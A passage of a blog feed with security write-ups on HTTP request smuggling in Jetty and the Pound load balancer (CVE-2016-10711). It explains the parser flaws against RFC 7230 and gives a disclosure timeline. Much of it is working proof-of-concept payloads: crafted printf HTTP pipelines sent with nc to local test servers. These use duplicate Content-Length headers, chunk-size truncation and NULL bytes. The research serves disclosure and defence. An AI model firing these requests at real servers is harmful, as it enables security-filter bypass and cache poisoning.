&#39;Host: localhost\r\n&#39;\
&#39;Connection: keepalive\r\n&#39;\
&#39;Content-Length: 45\r\n&#39;\
&#39;Content-Length: 0\r\n&#39;\
&#39;\r\n&#39;\
&#39;GET /?test=4967 HTTP/1.1\r\n&#39;\
&#39;Host: localhost\r\n&#39;\
&#39;\r\n&#39;\
|nc -q 1 127.0.0.1 8994 | grep &quot;HTTP&quot;

HTTP/1.1 400 Duplicate Content-Length
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Here it was a nice rejection, that&#39;s OK.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;bash&quot;&gt;printf &#39;GET /?test=4968 HTTP/1.1\r\n&#39;\
&#39;Host: localhost\r\n&#39;\
&#39;Connection: keepalive\r\n&#39;\
&#39;Content-Length: 0\r\n&#39;\
&#39;Content-Length: 45\r\n&#39;\
&#39;\r\n&#39;\
&#39;GET /?test=4969 HTTP/1.1\r\n&#39;\
&#39;Host: localhost\r\n&#39;\
&#39;\r\n&#39;\
|nc -q 1 127.0.0.1 8994 | grep &quot;HTTP&quot;

HTTP/1.1 200 OK
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;And then no rejection. You could say &quot;there&#39;s no splitting, we have only one response&quot;. The problem in fact is that the only good response is to &lt;strong&gt;reject&lt;/strong&gt; the message.
Let&#39;s imagine that we use a longer pipeline :&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;bash&quot;&gt;printf &#39;GET /?test=4970 HTTP/1.1\r\n&#39;\
&#39;Host: localhost\r\n&#39;\
&#39;Connection: keepalive\r\n&#39;\
&#39;Content-Length: 0\r\n&#39;\
&#39;Content-Length: 45\r\n&#39;\
&#39;\r\n&#39;\
&#39;GET /?test=4971 HTTP/1.1\r\n&#39;\
&#39;Host: localhost\r\n&#39;\
&#39;\r\n&#39;\
&#39;GET /?test=4972 HTTP/1.1\r\n&#39;\
&#39;Host: localhost\r\n&#39;\
&#39;\r\n&#39;\
|nc -q 1 127.0.0.1 8994 | grep &quot;HTTP&quot;

HTTP/1.1 200 OK
HTTP/1.1 200 OK
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;We have &lt;strong&gt;two responses&lt;/strong&gt;, but if we go through another actor which also forgot to reject the invalid message, this actor could interpret this pipeline as three queries and expect three responses instead of two (as there&#39;s no good way of choosing which Content-Length header is the right one). So this would start a response mix, and that&#39;s not good at all.&lt;/p&gt;

&lt;p&gt;This is in fact one of the key point of HTTP Smuggling, bif problems always comes when several issues, on several actors, are combined together to generate chaos.&lt;/p&gt;

&lt;h3&gt;Chunk size attribute truncation&lt;/h3&gt;

&lt;p&gt;You may have detected in the previous examples my usage of grep at the end of the command. That&#39;s not required, it&#39;s just a way to detect faster the number of responses received by the test.&lt;/p&gt;

&lt;p&gt;To change things I&#39;ll start directly with the test :&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;bash&quot;&gt;printf &#39;POST /?test=4973 HTTP/1.1\r\n&#39;\
&#39;Transfer-Encoding: chunked\r\n&#39;\
&#39;Content-Type: application/x-www-form-urlencoded\r\n&#39;\
&#39;Host: localhost\r\n&#39;\
&#39;\r\n&#39;\
&#39;100000000\r\n&#39;\
&#39;\r\n&#39;\
&#39;POST /?test=4974 HTTP/1.1\r\n&#39;\
&#39;Content-Length: 5\r\n&#39;\
&#39;Host: localhost\r\n&#39;\
&#39;\r\n&#39;\
&#39;\r\n&#39;\
&#39;0\r\n&#39;\
&#39;\r\n&#39;\
|nc -q 1 127.0.0.1 8994|grep &quot;HTTP/1.1&quot;

HTTP/1.1 200 OK
HTTP/1.1 200 OK
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Result is &lt;strong&gt;two responses&lt;/strong&gt;. But did we really had two requests ?&lt;/p&gt;

&lt;p&gt;In what looks like the first request we announc &lt;code&gt;Transfer-Encoding: chunked&lt;/code&gt;. It means we ignore anything related to Content-Length for body size calculation, we&#39;ll use chunks of data and an end-of-chunks marker to mark the end of the body. So we should get something like that in the request body :&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;5\r\n
xxxxxx\r\n
5\r\n
\r\n
xxxxxx\r\n
0\r\n
\r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;That is :&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;size of 1st chunk in hexa&amp;gt;\r\n
xxxxxx&amp;lt;chunk content&amp;gt;xxxxx\r\n
&amp;lt;size of 2nd chunk in hexa&amp;gt;\r\n
xxxxxx&amp;lt;chunk content&amp;gt;xxxxx\r\n
&amp;lt;size 0, dlast chunk, end of transmission&amp;gt;\r\n
\r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Our first request tells us, in hexa, a huge chunk with a size of 1000000000 (for decimal value I&#39;ll let you compute it, but really this is very huge). And we can understand that Jetty saw that as a &#39;0&#39;, so a last chunk marker, and &lt;code&gt;POST /?test=4974&lt;/code&gt; and all the following stuff has become a request, it was in reality just some garbage body data that the HTTP parser must not interpret.&lt;/p&gt;

&lt;p&gt;Let&#39;s look at a second example :&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;bash&quot;&gt;printf &#39;POST /?test=4975 HTTP/1.1\r\n&#39;\
&#39;Transfer-Encoding: chunked\r\n&#39;\
&#39;Content-Type: application/x-www-form-urlencoded\r\n&#39;\
&#39;Host: localhost\r\n&#39;\
&#39;\r\n&#39;\
&#39;1ff00000008\r\n&#39;\
&#39;abcdefgh\r\n&#39;\
&#39;\r\n&#39;\
&#39;0\r\n&#39;\
&#39;\r\n&#39;\
&#39;POST /?test=4976 HTTP/1.1\r\n&#39;\
&#39;Content-Length: 5\r\n&#39;\
&#39;Host: localhost\r\n&#39;\
&#39;\r\n&#39;\
&#39;\r\n&#39;\
&#39;0\r\n&#39;\
&#39;\r\n&#39;\
|nc -q 1 127.0.0.1 8994|grep &quot;HTTP/1.1&quot;

HTTP/1.1 200 OK
HTTP/1.1 200 OK
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Two responses again, &lt;code&gt;1ff00000008&lt;/code&gt; was interpreted as a &lt;code&gt;8&lt;/code&gt; and only &lt;code&gt;abcdefgh&lt;/code&gt; was used for the body.&lt;/p&gt;

&lt;p&gt;Solution of this mistery is that Jetty is (was) only taking the last 8 bytes of the &lt;em&gt;chunk size&lt;/em&gt; attribute (that looks a lot like the CVE-2015-3183 Apache issue that we found years ago, but the truncation was on the first bytes, not the last ones, and on more than 30 bytes) :&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;ffffffffffff00000000\r\n
            ^^^^^^^^
            00000000 =&amp;gt; size 0

1ff00000008\r\n
   ^^^^^^^^
   00000008 =&amp;gt; size 8
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;An HTTP server can say that such huge attribute for &#39;size of chunk&#39; is too big, and can then emit an HTTP error (like an error 400), but truncating the attribute used to compute the size of the bdoy is very dangerous. Here an attack would use a Reverse Proxy transmiting the chunks without rewriting it (that&#39;s a quite common case), and that would still be forwarding the arbitrary data of the first chunk, (with an unterminated request the reverse proxy is expecting several thousands of TeraBytes in input, that&#39;s what the client is announcing). On the Jetty side we would have ended the first query long ago, starting to handle the next requests in the pipeline that no-one saw before (in the previous example the &lt;code&gt;POST /?test=4976&lt;/code&gt;). Then sending a second response.&lt;/p&gt;

&lt;p&gt;From the various tests I made, Reverse Proxies does not like receiving responses as they still transfer data for the first request, and if they did not cut the communication at this precise moment they would still cut the communication when a second response is received. The issue is that this second request could be a forbidden request. The security filters that could exists in these Reverse proxies, WAF, load balancers, did not detect this second query, that&#39;s a &lt;strong&gt;security filter bypass&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Currently I do not see any other exploitation available, but someone with a creative mind may find a new one.&lt;/p&gt;

&lt;p&gt;Next time we&#39;ll talk about &lt;strong&gt;Apache Traffic Server&lt;/strong&gt;, with a lot more lab manipulations for the people which expect to train themselves on playing with requests using limits of the protocol.&lt;/p&gt;

&lt;h2&gt;Timeline&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;15 mai 2018: security report sent&lt;/li&gt;
&lt;li&gt;25 juin 2018: &lt;a href=&quot;https://www.eclipse.org/lists/jetty-announce/msg00123.html&quot;&gt;official public announce&lt;/a&gt; by the project&lt;/li&gt;
&lt;li&gt;avril 2019: this page&lt;/li&gt;
&lt;/ul&gt;


&lt;h2&gt;See also&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;http://regilero.github.io/security/english/2015/10/04/http_smuggling_in_2015_part_one/&quot;&gt;basics of HTTP Smuggling&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://regilero.github.io/security/english/2018/07/03/security_pound_http_smuggling/&quot;&gt;Pound SSl terminator smuggling issues&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Video &lt;a href=&quot;https://www.youtube.com/watch?v=dVU9i5PsMPY&quot;&gt;Defcon HTTP Smuggling&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Regilero-Hiding-Wookiees-In-Http.pdf&quot;&gt;Defcon support&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Video &lt;a href=&quot;https://www.youtube.com/watch?v=lY_Mf2Fv7kI&quot;&gt;Defcon demos&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
				<published>2019-04-24 00:00:00 +0200</published>
				<link>http://regilero.github.io/english/security/2019/04/24/security_jetty_http_smuggling/</link>
			</item>
		
			<item>
				<title>Security: HTTP Smuggling, Apsis Pound load balancer</title>
				<description>&lt;p&gt;&lt;small&gt;&lt;strong&gt;English version&lt;/strong&gt; (&lt;strong&gt;Version Française&lt;/strong&gt; disponible sur &lt;a href=&quot;https://www.makina-corpus.com/blog/metier/2018/contrebande-de-http-smuggling-load-balancer-apsis-pound&quot;&gt;makina corpus&lt;/a&gt;).&lt;/small&gt;
&lt;small&gt;estimated read time: 15min&lt;/small&gt;&lt;/p&gt;

&lt;h2&gt;Pound?&lt;/h2&gt;

&lt;p&gt;&lt;a href=&quot;http://www.apsis.ch/pound/&quot;&gt;Pound&lt;/a&gt; is an Open Source HTTP load balancer, usually used as an SSL/TLS terminator
(handling https and certificate in front of a more classical http backend).
Back in time it was a simple and efficient way of adding SSL for a website.&lt;/p&gt;

&lt;p&gt;If you check &lt;a href=&quot;http://www.apsis.ch/pound/&quot;&gt;the official website&lt;/a&gt; you&#39;ll see pound decribed as a load balancer, a reverse proxy, an SSL wrapper but also a &lt;strong&gt;sanitizer&lt;/strong&gt;:&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;an HTTP/HTTPS sanitizer: Pound will verify requests for correctness and accept only well-formed ones.&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;The project activity has been slowing down and this last CVE published in early 2018
may have triggered some warnings about the project activity.
The Debian project removed the package, not only because of that CVE, where &lt;a href=&quot;https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=888786&quot;&gt;a patch was available&lt;/a&gt;,
from &lt;a href=&quot;https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=891248&quot;&gt;this discussion&lt;/a&gt; it appears that compatibility with new versions of
openSSL and the lack of activity on the project contributed greatly to the decision.&lt;/p&gt;

&lt;h2&gt; Fixed versions of Pound&lt;/h2&gt;

&lt;p&gt;If we check the &lt;a href=&quot;https://tracker.debian.org/pkg/pound&quot;&gt;Debian status page&lt;/a&gt; for this package today (2018-07-03) we have a warning that the package has been removed because it cannot be find in any development repository, and 3 actions : outdated version, 1 ignored security issue in stretch (stable) and one in jessie (oldstable).
From my own test I cannot install it on jessie, but on stretch I&#39;m still able to install it, with the security issues inside.&lt;/p&gt;

&lt;p&gt;If you use a Suse package you have the &lt;a href=&quot;https://lists.opensuse.org/opensuse-updates/2018-02/msg00024.html&quot;&gt;security updates&lt;/a&gt; available.&lt;/p&gt;

&lt;p&gt;On the &lt;a href=&quot;http://www.apsis.ch/pound/&quot;&gt;official project page&lt;/a&gt; the officiel stable version is now Pound-2.8 and contains the fix.
The first fixed version was 2.8a (experimental), and there was a very long time for which only this experimental version was available.&lt;/p&gt;

&lt;p&gt;The source code diff for version 2.8 is not very big: (&lt;a href=&quot;https://fossies.org/diffs/Pound/2.7_vs_2.8/http.c-diff.html&quot;&gt;fossies1&lt;/a&gt; | &lt;a href=&quot;https://fossies.org/diffs/Pound/2.7_vs_2.8/http.c-diff.html&quot;&gt;fossies2&lt;/a&gt;  | &lt;a href=&quot;https://fossies.org/diffs/Pound/2.7_vs_2.8/config.c-diff.html&quot;&gt;fossies3&lt;/a&gt;).
It contains some feature removal (dynamic scaling) and security syntax filters on HTTP Smuggling issues.
That&#39;s the interesting part.&lt;/p&gt;

&lt;h2&gt;CVE-2016-10711&lt;/h2&gt;

&lt;p&gt;The &lt;a href=&quot;https://www.cvedetails.com/cve/CVE-2016-10711/&quot;&gt;official CVE description&lt;/a&gt; is:&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;Apsis Pound before 2.8a allows request smuggling via crafted headers&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;Most of the issues are in fact &lt;strong&gt;very common mistakes&lt;/strong&gt; with HTTP parsers (with
some specific rare issues also, like NULL character handling). Or I should say
it &lt;strong&gt;was common&lt;/strong&gt; before 2005 and before &lt;a href=&quot;https://tools.ietf.org/html/rfc7230&quot;&gt;RFC 7230&lt;/a&gt;. In the past years
I have reported similar issues in a lot of projects, small ones, and sometimes
bigger ones, so it could be interesting to study some of these &lt;em&gt;&#39;crafted headers&#39;&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;Note that, as explained later, Pound, being an SSl terminator, is not the most
critical piece in a smuggling attack. Performing such attacks on a reverse proxy
cache, or a common HTTP server, is more valuable for an attacker. But the whole
&#39;HTTP Smuggling attacks&#39; paradigm is based on chaining syntax errors on multiple
actors, so everyone should detect the strange &lt;em&gt;crafted headers&lt;/em&gt; and behave properly.&lt;/p&gt;

&lt;h3&gt;1- Double content-length support:&lt;/h3&gt;

&lt;p&gt;Any request with 2 &lt;code&gt;Content-Length&lt;/code&gt; headers &lt;strong&gt;MUST&lt;/strong&gt; be rejected.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://tools.ietf.org/html/rfc7230#section-3.3.2&quot;&gt;RFC7230 section 3.3.2&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;If a message is received that has multiple Content-Length header
fields with field-values consisting of the same decimal value, or a
single Content-Length header field with a field value containing a
list of identical decimal values (e.g., &quot;Content-Length: 42, 42&quot;),
indicating that duplicate Content-Length header fields have been
generated or combined by an upstream message processor, then the
recipient MUST either reject the message as invalid or replace the
duplicated field-values with a single valid Content-Length field
containing that decimal value prior to determining the message body
length or forwarding the message.&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;&lt;a href=&quot;https://tools.ietf.org/html/rfc7230#section-3.3.3&quot;&gt;RFC7230 section 3.3.3&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;If a message is received without Transfer-Encoding and with
either multiple Content-Length header fields having differing
field-values or a single Content-Length header field having an
invalid value, then the message framing is invalid and the
recipient MUST treat it as an unrecoverable error.  If this is a
request message, the server MUST respond with a 400 (Bad Request)
status code and then close the connection.&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;For Pound, If you send a request with:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;Content-Length: 0
Content-Length: 147
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Result is &lt;code&gt;Size of Body = 0&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;If you send one with:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;Content-Length: 147
Content-Length: 0
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Result is &lt;code&gt;Size of Body = 147&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;The only official result should be &lt;strong&gt;an error&lt;/strong&gt;. If a previous actor in the HTTP
communication contains the same flaw, but inverted, You have an easy smuggling factor.
We will see below some example of HTTP pipelines exploits, the goal is usually
to have a size which differs, one actor is seing 3 requests, another actor thinks
there&#39;s only 2.&lt;/p&gt;

&lt;h3&gt;2) Chunks priority on Content-Length&lt;/h3&gt;

&lt;p&gt;Here we have again the &lt;a href=&quot;https://tools.ietf.org/html/rfc7230#section-3.3.3&quot;&gt;RFC7230 section 3.3.3&lt;/a&gt;, but another point:&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;If a message is received with both a Transfer-Encoding and a
Content-Length header field, the Transfer-Encoding overrides the
Content-Length. Such a message might indicate an attempt to
perform request smuggling (Section 9.5) or response splitting
(Section 9.4) and ought to be handled as an error.&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;So the rule is that you can reject the message (this is now the case in
most servers), but at least, if you do not reject the message the
chunked transmission has the priority on any Content-Length headers.&lt;/p&gt;

&lt;p&gt;With Pound the rule was the first header read has the priority. Bad.&lt;/p&gt;

&lt;p&gt;Let&#39;s see an example. Here I have Pound Server listening on HTTP port 8080 on 127.0.0.1. (So without HTTPS support, but believe me in HTTPS mode all the attacks works the same, you can even use openssl_client instead of netcat to push some printf output on it). Behind that Pound talks to an HTTP server (the backend), on any other port.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;I use &lt;code&gt;printf&lt;/code&gt; to render my HTTP queries, I do not use curl or wget, because I want full control on all characters.&lt;/li&gt;
&lt;li&gt;I &lt;strong&gt;chain all the queries&lt;/strong&gt; in one single string, I do not wait for responses between each queries, that&#39;s called an &lt;strong&gt;HTTP pipeline&lt;/strong&gt;, without pipelining support on the server (here Pound) I cannot do anything&lt;/li&gt;
&lt;li&gt;I send this string (of HTTP queries) to netcat (command &lt;code&gt;nc&lt;/code&gt;) which is a very low level command which simply controls the tcp/ip connection to the targeted IP and port.&lt;/li&gt;
&lt;li&gt;this is the same as sending an HTTP query with a browser or with curl, but I have full control on nasty crafted headers&lt;/li&gt;
&lt;li&gt;the attacker goal is to send messages that could contain a different number of queries if it is read by a valid parser or an invalid one, that&#39;s the &lt;strong&gt;technical goal&lt;/strong&gt;. The functionnal goal of this is security filter bypass or cache poisoning, or some more complex stuff, but like an &lt;code&gt;alert()&lt;/code&gt; for XSS, which is just a technical proff and not a functionnal attack, if you have the wrong number of valid responses, there&#39;s a security issue.&lt;/li&gt;
&lt;li&gt;If you try it on a test environment you should track the requests sent by Pound on your backend, use Wireshark for example. Each request of the pipeline will be send individually to the backend, not in a pipeline.&lt;/li&gt;
&lt;/ul&gt;


&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;c&quot;&gt;# 2 responses instead of 3&lt;/span&gt;
&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET / HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Content-length:56\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Transfer-Encoding: chunked\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;0\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /tmp HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /tests HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt; nc -q3 127.0.0.1 8080&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;For a &lt;strong&gt;valid parser&lt;/strong&gt; there are 3 queries:&lt;/p&gt;

&lt;p&gt;First one:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;GET / HTTP/1.1[CRLF]
Host:localhost[CRLF]
**Content-length:56[CRLF]** (ignored and usually not send back to the backend)
Transfer-Encoding: chunked[CRLF]
Dummy:Header[CRLF]
[CRLF]
0[CRLF]  (end of chunks -&amp;gt; end of message)
[CRLF]
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Second one:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;GET /tmp HTTP/1.1[CRLF]
Host:localhost[CRLF]
Dummy:Header[CRLF]
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;And third one:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;GET /tests HTTP/1.1[CRLF]
Host:localhost[CRLF]
Dummy:Header[CRLF]
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;For an &lt;strong&gt;invalid parser&lt;/strong&gt; (here Pound) there&#39;s only 2 queries and the first one is:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;GET / HTTP/1.1[CRLF]
Host:localhost[CRLF]
Content-length:56[CRLF]
**Transfer-Encoding: chunked[CRLF]** (ignored and removed, hopefully)
Dummy:Header[CRLF]
[CRLF]
0[CRLF]  (start of 56 bytes of body)
[CRLF]
GET /tmp HTTP/1.1[CRLF]
Host:localhost[CRLF]
Dummy:Header[CRLF] (end of 56 bytes of body, not parsed)
&lt;/code&gt;&lt;/pre&gt;

&lt;h3&gt;3) Bad chunked transmission&lt;/h3&gt;

&lt;p&gt;&lt;a href=&quot;https://tools.ietf.org/html/rfc7230#section-3.3.3&quot;&gt;RFC7230 section 3.3.3&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;If a Transfer-Encoding header field
is present in a request and the chunked transfer coding is not
the final encoding, the message body length cannot be determined
reliably; the server MUST respond with the 400 (Bad Request)
status code and then close the connection.&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;Using &lt;code&gt;Transfer-Encoding: chunked, zorg&lt;/code&gt; we did not have the error 400.&lt;/p&gt;

&lt;h3&gt;4) NULL in headers -&gt; concatenation&lt;/h3&gt;

&lt;p&gt;That&#39;s an original issue, a rare one (but the NULL character is always fun to test).&lt;/p&gt;

&lt;p&gt;Like most HTTP servers Pound is written in C, and C string ends with the NULL character (&lt;code&gt;\0&lt;/code&gt;).
Finding a NULL character in an HTTP request (not the body part) should render an error,
but sometimes the parser does not detect the NULL character because the parsed line was wrongly interpreted as a C string.&lt;/p&gt;

&lt;p&gt;With Pound as soon as a NULL character was encountered in an header line the parser would continue the header with the next line.&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;c&quot;&gt;# 2 responses instead of 3 (2nd query is wipped out by pound, used as a body)&lt;/span&gt;
&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET / HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Content-\0dummy: foo\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;length: 56\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Transfer-Encoding: chunked\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;0\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /tmp HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /tests HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Dummy:Header\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt; nc -q3 127.0.0.1 8080&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Here is another variation using the Double Content-length Support. This could be
used if the previous actor in the chain of proxies had no support for double
Content-Length (very likely).. but had support for NULL characters (less likely).&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;c&quot;&gt;# 2 responses instead of 3 (2nd query is wipped out by pound, used as a body)&lt;/span&gt;
&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET / HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:localhost\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Content-\0dummy: foo\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;length: 51\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Content-length: 0\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /tmp HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
